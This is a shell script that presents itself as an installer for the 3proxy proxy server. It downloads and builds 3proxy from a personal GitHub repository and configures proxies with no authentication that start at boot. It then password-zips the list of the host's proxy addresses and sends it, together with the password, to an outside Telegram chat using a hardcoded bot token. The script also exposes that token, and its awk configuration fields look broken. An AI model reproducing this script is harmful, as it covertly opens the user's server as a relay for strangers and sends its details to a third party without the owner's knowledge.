#!/bin/sh

random() {
    tr </dev/urandom -dc A-Za-z0-9 | head -c5
    echo
}

array=(1 2 3 4 5 6 7 8 9 0)

gen_ipv4() {
    echo "${array[$RANDOM % 10]}.${array[$RANDOM % 10]}.${array[$RANDOM % 10]}.${array[$RANDOM % 10]}"
}

install_3proxy() {
    echo "installing 3proxy"
    URL="https://raw.githubusercontent.com/quayvlog/quayvlog/main/3proxy-3proxy-0.8.6.tar.gz"
    wget -qO- $URL | bsdtar -xvf-
    cd 3proxy-3proxy-0.8.6
    make -f Makefile.Linux
    mkdir -p /usr/local/etc/3proxy/{bin,logs,stat}
    cp src/3proxy /usr/local/etc/3proxy/bin/
    cp ./scripts/rc.d/proxy.sh /etc/init.d/3proxy
    chmod +x /etc/init.d/3proxy
    chkconfig 3proxy on
    cd $WORKDIR
}

gen_3proxy() {
    cat <<EOF
daemon
maxconn 1000
nscache 65536
timeouts 1 5 30 60 180 1800 15 60
flush

$(awk -F "/" '{print "auth none\n" \
"allow * \n" \
"proxy -n -a -p" $4 ":" $6 ":" $7 " -i" $3 " -e"$5"\n" \
"flush\n"}' ${WORKDATA})
EOF
}

gen_data() {
    seq $FIRST_PORT $LAST_PORT | while read port; do
        echo "$IP4/32/$port/$(random)"
    done
}

gen_proxy_file() {
    cat >proxy.txt <<EOF
$(awk -F "/" '{print $3 ":" $4 }' ${WORKDATA})
EOF
}

upload_proxy() {
    local PASS=$(random)
    local ZIP_FILE="proxy.zip"
    zip --password $PASS $ZIP_FILE proxy.txt

    # Gửi tệp proxy.zip đến bot Telegram
    send_telegram_message "$ZIP_FILE" "$PASS"
}

send_telegram_message() {
    local BOT_TOKEN="6993056063:AAFPwvXwIaysQ4_LbBalYWz77gXwVGk8Jrc"
    local CHAT_ID="5257679444"
    local FILE="$1"
    local PASS="$2"

    local MESSAGE="Proxy is ready! Download the file and use password: ${PASS} for extraction."

    # Gửi tệp và mật khẩu đến bot Telegram
    curl -F chat_id="$CHAT_ID" -F document=@"$FILE" "https://api.telegram.org/bot$BOT_TOKEN/sendDocument" -F caption="$MESSAGE"
}

echo "installing apps"
yum -y install gcc net-tools bsdtar zip >/dev/null
install_3proxy

echo "working folder = /home/proxy-installer"
WORKDIR="/home/proxy-installer"
WORKDATA="${WORKDIR}/data.txt"
mkdir $WORKDIR && cd $_

IP4=$(curl -4 -s icanhazip.com)

echo "Internal IPv4 = ${IP4}"

echo "How many proxy do you want to create? Example 500"
read COUNT

FIRST_PORT=10000
LAST_PORT=$(($FIRST_PORT + $COUNT))

gen_data >$WORKDIR/data.txt
gen_3proxy >/usr/local/etc/3proxy/3proxy.cfg

cat >>/etc/rc.local <<EOF
ulimit -n 10048
service 3proxy start
EOF

bash /etc/rc.local

gen_proxy_file
upload_proxy
